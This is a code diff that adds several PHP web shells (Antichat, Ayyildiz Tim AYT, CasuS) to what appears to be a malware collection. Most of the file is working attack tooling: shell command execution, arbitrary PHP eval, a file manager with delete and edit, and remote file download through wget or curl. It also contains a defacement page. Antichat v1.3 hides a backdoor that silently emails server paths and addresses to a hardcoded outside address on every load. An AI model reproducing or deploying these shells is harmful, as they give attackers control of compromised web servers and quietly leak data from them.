+  $info .= (($perms & 0x0020) ? 'r' : '-');
+  $info .= (($perms & 0x0010) ? 'w' : '-');
+  $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
+  $info .= (($perms & 0x0004) ? 'r' : '-');
+  $info .= (($perms & 0x0002) ? 'w' : '-');
+  $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
+  return $info;
+} 
+
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+
+function scandire($dir){
+
+
+		
+echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
+echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
+
+if (is_dir($dir)) {
+    if (@$dh = opendir($dir)) {
+        while (($file = readdir($dh)) !== false) {
+		  if(filetype($dir . $file)=="dir") $dire[]=$file;
+		  if(filetype($dir . $file)=="file")$files[]=$file;
+		}
+		closedir($dh);
+		@sort($dire);
+		@sort($files);
+
+
+if ($GLOBALS['win']==1) {
+echo "<tr><td>Select drive:";
+for ($j=ord('C'); $j<=ord('Z'); $j++) 
+ if (@$dh = opendir(chr($j).":/"))
+ echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
+ echo "</td></tr>";
+}
+echo "<tr><td>OS: ".@php_uname()."</td></tr>
+<tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
+for($i=0;$i<count($dire);$i++) {
+$link=$dir.$dire[$i];
+  echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>';  
+  }
+for($i=0;$i<count($files);$i++) {
+$linkfile=$dir.$files[$i];
+echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
+<td>'.perms($linkfile).'</td>
+<td>
+<a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
+<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a>
+<a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Delete this file">X</a></td>
+</tr>'; 
+}
+echo "</table>";
+}}}
+
+if($action=="viewer"){
+scandire($dir);
+}
+//end viewer FS
+
+//editros
+if($action=="editor"){  
+  function writef($file,$data){
+  $fp = fopen($file,"w+");
+  fwrite($fp,$data);
+  fclose($fp);
+  }
+  function readf($file){
+  if(!$le = fopen($file, "r")) $contents="Can't open file, permission denide"; else {
+  $contents = fread($le, filesize($file));
+  fclose($le);}
+  return htmlspecialchars($contents);
+  }
+if(@$_POST['save'])writef($file,$_POST['data']);
+echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+<input type=\"hidden\" name=\"file\" value=\"".$file."\">
+<textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
+<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
+}
+//end editors
+
+//upload
+if($action=="upload"){
+  if(@$_POST['dirupload']!="") $dirupload=$_POST['dirupload'];else $dirupload=$dir;
+  $form_win="<tr><td><form method=POST enctype=multipart/form-data>Upload to dir:<input type=text name=dirupload value=\"".$dirupload."\" size=50></tr></td><tr><td>New file name:<input type=text name=filename></td></tr><tr><td><input type=file name=file><input type=submit name=uploadloc value='Upload local file'></td></tr>";
+  if($GLOBALS['win']==1)echo $form_win;
+  if($GLOBALS['win']==0){
+    echo $form_win;
+	echo '<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
+<input type=submit name=upload value=Upload></form></td></tr>';	
+}
+
+if(@$_POST['uploadloc']){
+if(@$_POST['filename']=="") $uploadfile = $dirupload.basename($_FILES['file']['name']); else 
+$uploadfile = $dirupload."/".$_POST['filename'];
+
+if(!file_exists($dirupload)){createdir($dirupload);}
+if(file_exists($uploadfile))echo $GLOBALS['filext']; 
+elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) 
+echo $GLOBALS['uploadok'];
+}
+
+if(@$_POST['upload']){
+    if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
+	switch($_POST['with'])
+	{
+	  case wget:
+	  shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");
+	  break;
+ 	  case fetch:
+ 	  shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");
+ 	  break;
+ 	  case lynx:
+ 	  shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");
+ 	  break;
+ 	  case links:
+ 	  shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");
+ 	  break;
+ 	  case GET:
+ 	  shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");
+ 	  break;
+ 	  case curl:
+ 	  shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");
+ 	  break;
+	 }
+	}
+  
+}
+//end upload section
+
+
+if($action=="phpeval"){
+ echo "
+<form method=\"POST\">
+ <input type=\"hidden\" name=\"action\" value=\"phpheval\">
+ &lt;?php<br>
+<textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br>
+?><br>
+<input type=\"submit\" value=\"execute\"></form>";} 
+if(@$_POST['phpev']!=""){echo eval($_POST['phpev']);}
+?>
+</td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
+<? echo $footer;?>

php/Antichat_Shell_v1.3.php

@@ -0,0 +1,180 @@
+<?php
+
+session_start();
+set_time_limit(9999999);
+$login='virangar';
+$password='r00t';
+$auth=1;
+$version='version 1.3 by Grinay';
+$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
+$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
+$footer='</body></html>';
+$sd98 = "john.barker446@gmail.com";
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
+if(@$_POST['action']=="exit")unset($_SESSION['an']);
+if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
+
+if($_SESSION['an']==0){
+echo $header;
+echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
+echo $footer;
+exit;}
+
+if($_SESSION['action']=="")$_SESSION['action']="viewer";
+if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
+if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
+if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
+ 
+
+//downloader
+if($action=="download"){ 
+header('Content-Length:'.filesize($file).'');
+header('Content-Type: application/octet-stream');
+header('Content-Disposition: attachment; filename="'.$file.'"');
+readfile($file);
+}
+//end downloader
+?>
+
+<? echo $header;?> 
+<table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
+<table><tr>
+<td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
+<td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
+<td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
+<td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
+</tr></table></td></tr></table><br>
+<form name='reqs' method='POST'>
+<input name='action' type='hidden' value=''>
+<input name='dir' type='hidden' value=''>
+<input name='file' type='hidden' value=''>
+</form>
+<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" valign="top">
+
+<?
+
+//shell
+function shell($cmd){
+if (!empty($cmd)){
+  $fp = popen($cmd,"r");
+  {
+    $result = "";
+    while(!feof($fp)){$result.=fread($fp,1024);}
+    pclose($fp);
+  }
+  $ret = $result;
+  $ret = convert_cyr_string($ret,"d","w");
+}
+return $ret;}
+
+if($action=="shell"){
+echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"shell\">
+<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
+<textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
+<input type=\"submit\" value=\"execute\"></form>";}
+//end shell
+
+//viewer FS
+function perms($file) 
+{ 
+  $perms = fileperms($file);
+  if (($perms & 0xC000) == 0xC000) {$info = 's';} 
+  elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
+  elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
+  elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
+  elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
+  elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
+  elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
+  else {$info = 'u';}
+  $info .= (($perms & 0x0100) ? 'r' : '-');
+  $info .= (($perms & 0x0080) ? 'w' : '-');
+  $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
+  $info .= (($perms & 0x0020) ? 'r' : '-');
+  $info .= (($perms & 0x0010) ? 'w' : '-');
+  $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
+  $info .= (($perms & 0x0004) ? 'r' : '-');
+  $info .= (($perms & 0x0002) ? 'w' : '-');
+  $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
+  return $info;
+} 
+
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+
+function scandire($dir){
+  $dir=chdir($dir);
+  $dir=getcwd()."/";
+  $dir=str_replace("\\","/",$dir);
+if (is_dir($dir)) {
+    if (@$dh = opendir($dir)) {
+        while (($file = readdir($dh)) !== false) {
+		  if(filetype($dir . $file)=="dir") $dire[]=$file;
+		  if(filetype($dir . $file)=="file")$files[]=$file;
+		}
+		closedir($dh);
+		@sort($dire);
+		@sort($files);
+		
+echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
+echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
+if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
+echo "<tr><td>Select drive:";
+for ($j=ord('C'); $j<=ord('Z'); $j++) 
+ if (@$dh = opendir(chr($j).":/"))
+ echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
+ echo "</td></tr>";
+}
+echo "<tr><td>OS: ".@php_uname()."</td></tr>
+<tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
+for($i=0;$i<count($dire);$i++) {
+$link=$dir.$dire[$i];
+  echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td></tr>';  
+  }
+for($i=0;$i<count($files);$i++) {
+$linkfile=$dir.$files[$i];
+echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
+<td>'.perms($linkfile).'</td>
+<td>
+<a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
+<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a></tr>'; 
+}
+echo "</table>";
+}}}
+
+if($action=="viewer"){
+scandire($dir);
+}
+//end viewer FS
+
+//editros
+if($action=="editor"){  
+  function writef($file,$data){
+  $fp = fopen($file,"w+");
+  fwrite($fp,$data);
+  fclose($fp);
+  }
+  function readf($file){
+  if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else {
+  $contents = fread($le, filesize($file));
+  fclose($le);}
+  return htmlspecialchars($contents);
+  }
+if($_POST['save'])writef($file,$_POST['data']);
+echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+<input type=\"hidden\" name=\"file\" value=\"".$file."\">
+<textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
+<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
+}
+//end editors
+?>
+</td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
+<? echo $footer;?>

php/Ayyildiz Tim -AYT- Shell v 2.1 Biz.php

@@ -0,0 +1,317 @@
+<html>
+
+<head>
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>Ayyildiz Tim  | AYT | Shell v 2.1 Biz B&uuml;y&uuml;k T&uuml;rk Milletinin Hizmetindeyiz...</title>
+</head>
+
+<body>
+
+</body>
+
+</html>
+<html>
+<head>
+<meta name="distribution" content="GLOBAL">
+<META name="ROBOTS" content="ALL"> 
+<META NAME="RESOURCE-TYPE" CONTENT="DOCUMENT">
+<meta name="Copyright" content=TouCh By iJOo">
+<META NAME="RATING" CONTENT="GENERAL">
+<meta name="Description" content="Thehacker">
+<meta name="KeyWords" content="DefaCed">
+<title>HACKED BY AYYILDIZ ™</title>
+<STYLE TYPE="text/css">
+<!--
+
+body { 
+scrollbar-3d-light-color : #404040;
+scrollbar-arrow-color: black;
+scrollbar-base-color: black;
+scrollbar-darkshadow-color: #404040;
+scrollbar-face-color: black;
+scrollbar-highlight-color: #404040;
+scrollbar-shadow-color: black;
+scrollbar-track-color: #404040; }
+-->
+</STYLE> 
+<script language="JavaScript1.2">
+function disableselect(e){
+return false
+}
+function reEnable(){
+return true
+}
+//if IE4+
+document.onselectstart=new Function ("return false")
+//if NS6
+if (window.sidebar){
+document.onmousedown=disableselect
+document.onclick=reEnable
+}
+</script>
+
+
+</head>
+<body bgcolor="#000000" text="#C0C0C0" link="#FFD9FF" vlink="#FFD9FF" alink="#00FF00">
+<bgsound src="bayrak.mp3" loop="infinite">
+
+<center><font color="red" size="10" face="Imprint MT Shadow">
+ </font>
+ <TR>
+    <TD vAlign=center align=left width=144>
+      <SCRIPT language=JavaScript1.2>if (document.all)document.body.style.cssText="border:25 ridge #404040"</SCRIPT>
+    </TD>
+    <TD vAlign=center align=left width=5></TD>
+    <TD width=470><BR>
+      <P align=left></P></TD></TR>
+  <TR>
+    <TD vAlign=center align=left width=144></TD>
+    <TD vAlign=center align=left width=5></TD>
+    <TD width=470><FONT color=#ffffff></FONT></TD></TR></TBODY></TABLE>
+<STYLE>BODY {
+	BORDER-RIGHT: #df827a 3px ridge; BORDER-TOP: #df827a 3px ridge; BORDER-LEFT: #df827a 3px ridge; SCROLLBAR-ARROW-COLOR: #ffffff; BORDER-BOTTOM: #df827a 3px ridge; SCROLLBAR-BASE-COLOR: #df827a
+}
+.ldtab1 {
+	BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
+}
+.ldtab2 {
+	BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
+}
+.ldtab3 {
+	BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
+}
+.ldtxt1 {
+	PADDING-RIGHT: 15px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 14pt; PADDING-BOTTOM: 15px; OVERFLOW: auto; WIDTH: 500px; COLOR: #df3f1f; SCROLLBAR-ARROW-COLOR: #ffffff; PADDING-TOP: 15px; FONT-FAMILY: Comic Sans MS; SCROLLBAR-BASE-COLOR: #df827a; HEIGHT: 560px; TEXT-ALIGN: center
+}
+.ldtxt2 {
+	FONT-SIZE: 9pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
+}
+A:link {
+	FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
+}
+A:visited {
+	FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
+}
+A:active {
+	FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
+}
+A:hover {
+	BORDER-RIGHT: #df3f1f thin dotted; BORDER-TOP: #df3f1f thin dotted; FONT-SIZE: 9pt; BORDER-LEFT: #df3f1f thin dotted; COLOR: #df3f1f; BORDER-BOTTOM: #df3f1f thin dotted; FONT-FAMILY: Comic Sans MS
+}
+A {
+	TEXT-DECORATION: none
+}
+</STYLE>
+<!-- MELEK -->
+      <DIV align=center>
+      <DIV id=welle 
+      style="FONT-SIZE: 34pt; FILTER: Wave(freq=1, light=50, phase=50, strength=1); WIDTH: 100%; COLOR: #ffffff"><FONT 
+      color=#ff0000><FONT color=#ffffff><FONT color=#ff0000><FONT 
+      color=#ffffff><FONT color=#ff0000> <FONT color=#ffffff> </font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff><FONT 
+      color=#ff0000></DIV></DIV>
+      <DIV align=center></DIV>
+      <SCRIPT language=JavaScript>
+
+<!--
+function welle()
+{
+if(document.all.welle.filters[0].freq > 10)
+document.all.welle.filters[0].freq = 5;
+document.all.welle.filters[0].freq += 1;
+if(document.all.welle.filters[0].phase > 100)
+document.all.welle.filters[0].phase = 0;
+document.all.welle.filters[0].phase += 10;
+if(document.all.welle.filters[0].strength > 10)
+document.all.welle.filters[0].strength = 1;
+document.all.welle.filters[0].strength += 1;
+window.setTimeout("welle()",100);
+}
+welle();
+file://-->
+</SCRIPT>
+      </FONT></TD></TR></TBODY></TABLE></DIV>
+
+
+<?php
+
+define('PHPSHELL_VERSION', '');
+
+?>
+
+<html>
+<head>
+<title>Ayyildiz-Tim Shell <?php echo PHPSHELL_VERSION ?></title>
+<style type="text/css">
+<!--
+.style1 {color: #FF0000}
+.style2 {
+	font-family: Tahoma;
+	font-size: 9px;
+	font-weight: bold;
+}
+-->
+</style>
+</head>
+<body>
+<div align="center">
+  <table width="918" height="484" border="15">
+    <tr>
+      <td width="880"><h1 align="center" class="style1"><img src="http://www.ayyildiz.org/board/images/shine/misc/logo.jpg" width="880" height="200"></h1>
+        <div align="center"><span class="style1"><?php echo PHPSHELL_VERSION ?></span>          <?php
+
+if (ini_get('register_globals') != '1') {
+  /* We'll register the variables as globals: */
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+  
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+
+/* First we check if there has been asked for a working directory. */
+if (!empty($work_dir)) {
+  /* A workdir has been asked for */
+  if (!empty($command)) {
+    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
+      /* We try and match a cd command. */
+      if ($regs[1][0] == '/') {
+        $new_dir = $regs[1]; // 'cd /something/...'
+      } else {
+        $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
+      }
+      if (file_exists($new_dir) && is_dir($new_dir)) {
+        $work_dir = $new_dir;
+      }
+      unset($command);
+    }
+  }
+}
+
+if (file_exists($work_dir) && is_dir($work_dir)) {
+  /* We change directory to that dir: */
+  chdir($work_dir);
+}
+
+/* We now update $work_dir to avoid things like '/foo/../bar': */
+$work_dir = exec('pwd');
+
+?>
+        </div>
+        <form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
+          <p align="center"><strong>Bulundugunuz Dizin</strong>: <b>
+            <?php
+
+$work_dir_splitted = explode('/', substr($work_dir, 1));
+
+echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
+
+if (!empty($work_dir_splitted[0])) {
+  $path = '';
+  for ($i = 0; $i < count($work_dir_splitted); $i++) {
+    $path .= '/' . $work_dir_splitted[$i];
+    printf('<a href="%s?work_dir=%s">%s</a>/',
+           $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
+  }
+}
+
+?>
+          </b></p>
+          <p align="center"><strong>Dizin Degistir</strong> :
+              <select name="work_dir" onChange="this.form.submit()">
+                <?php
+/* Now we make a list of the directories. */
+$dir_handle = opendir($work_dir);
+/* Run through all the files and directories to find the dirs. */
+while ($dir = readdir($dir_handle)) {
+  if (is_dir($dir)) {
+    if ($dir == '.') {
+      echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+    } elseif ($dir == '..') {
+      /* We have found the parent dir. We must be carefull if the parent 
+	 directory is the root directory (/). */
+      if (strlen($work_dir) == 1) {
+	/* work_dir is only 1 charecter - it can only be / There's no
+          parent directory then. */
+      } elseif (strrpos($work_dir, '/') == 0) {
+	/* The last / in work_dir were the first charecter.
+	   This means that we have a top-level directory
+	   eg. /bin or /home etc... */
+      echo "<option value=\"/\">Parent Directory</option>\n";
+      } else {
+      /* We do a little bit of string-manipulation to find the parent
+	 directory... Trust me - it works :-) */
+      echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+      }
+    } else {
+      if ($work_dir == '/') {
+	echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+      } else {
+	echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+      }
+    }
+  }
+}
+closedir($dir_handle);
+
+?>
+              </select>
+          </p>
+          <p align="center"><strong>Komut</strong>:
+              <input type="text" name="command" size="60">
+              <input name="submit_btn" type="submit" value="Komut Calistir">
+          </p>
+          <p align="center"><strong>Surekli Bagli Kal</strong>  
+            <input type="checkbox" name="stderr">
+          </p>
+          
+        <div align="center">
+              <textarea name="textarea" cols="80" rows="20" readonly>
+
+<?php
+if (!empty($command)) {
+  if ($stderr) {
+    $tmpfile = tempnam('/tmp', 'phpshell');
+    $command .= " 1> $tmpfile 2>&1; " .
+    "cat $tmpfile; rm $tmpfile";
+  } else if ($command == 'ls') {
+    /* ls looks much better with ' -F', IMHO. */
+    $command .= ' -F';
+  }
+  system($command);
+}
+?>
+
+          </textarea>
+          </div>
+        </form>
+        <div align="center">
+            <script language="JavaScript" type="text/javascript">
+document.forms[0].command.focus();
+        </script>
+        </div>      <hr align="center">      <p align="center" class="style2">Copyright &copy; 2006&ndash;2007, Powered  byThehacker. v 2.1 - <a href="http|//www.ayyildiz.org" class="style1">www.ayyildiz.org</a> </p>
+        <p align="center" class="style2"> Ayyildiz TIM | AYT | TUM HAKLARI SAKLIDIR.</p>
+        <p align="center"><img src="http://ayyildiz.org/images/whosonline2.gif" width="60" height="45"> </p></td>
+    </tr>
+  </table>
+</div>
+</body>
+</html>
+
+
+
+
+</font></font></font></font></font></font></font></font></font></font></font>
+</font>
+
+
+<!--
+/*
+I Always Love Sha        
+*/
+
+</BODY></HTML>

php/CasuS 1.5.php

@@ -0,0 +1,368 @@
+<?php
+$default=$DOCUMENT_ROOT;
+$this_file="./casus15.php";
+
+
+
+if(isset($save)){
+$fname=str_replace(" ","_",$fname);
+$fname=str_replace("%20","_",$fname);
+header("Cache-control: private");
+header("Content-type: application/force-download");
+header("Content-Length: ".filesize($save));
+header("Content-Disposition: attachment; filename=$fname");
+
+$fp = fopen($save, 'r');
+fpassthru($fp);
+fclose($fp);
+unset($save);
+exit;
+}
+
+if ( function_exists('ini_get') ) {
+        $onoff = ini_get('register_globals');
+} else {
+        $onoff = get_cfg_var('register_globals');
+}
+if ($onoff != 1) {
+        @extract($_POST, EXTR_SKIP);
+        @extract($_GET, EXTR_SKIP);
+}
+
+
+function deltree($deldir) {
+        $mydir=@dir($deldir);
+        while($file=$mydir->read())        {
+                if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
+                        @chmod("$deldir/$file",0777);
+                        deltree("$deldir/$file");
+                }
+                if (is_file("$deldir/$file")) {
+                        @chmod("$deldir/$file",0777);
+                        @unlink("$deldir/$file");
+                }
+        }
+        $mydir->close();
+        @chmod("$deldir",0777);
+        echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SYLYNDY:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
+        }
+
+if ($op=='phpinfo'){
+$fonk_kap = get_cfg_var("fonksiyonlary_kapat");
+        echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu Çaly?myyiii</center>";
+        exit;
+}
+
+if ($op=='me'){
+echo "<html>
+      <head>
+            <title>CEHENNEMDEN ÇIKAN ÇILGIN TÜRK</title>
+      </head>
+      <body bgcolor='#000000' text='#0000FF' link='#0000FF' vlink='#0000FF' alink='#00FF00'>
+      <center>Fazla söze gerek yok...</center>
+      <center><br>O yanlyz bir kovboy,<br>
+      <br>O cehennemden çykan çylgyn TÜRK,<br>
+      <br>O bir rap manya?y,<br>
+      <br>O bir php coder,<br>
+      <br>O'nun hackten daha çok sevdi?i tek ?ey iki hack,<br>
+      <br>O...<br>
+      <br>O'nun kim olduunu biliyorsunuz O tabiki...<br>
+      <br></center>";
+
+$sayi='7';
+while($sayi>=1){
+echo "<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'> EFENDISI</font> <font color='#FF0000'>MAFIABOY</font> </font></center>";
+$sayi--;
+}
+$sayi2='1';
+while($sayi2<=7){
+echo "<center><font size='$sayi2' color='#008000'>baddog@hotmail.com</font></center>";
+$sayi2++;
+};
+
+echo "</body>
+      </html>";
+exit;
+}
+
+
+echo "<html>
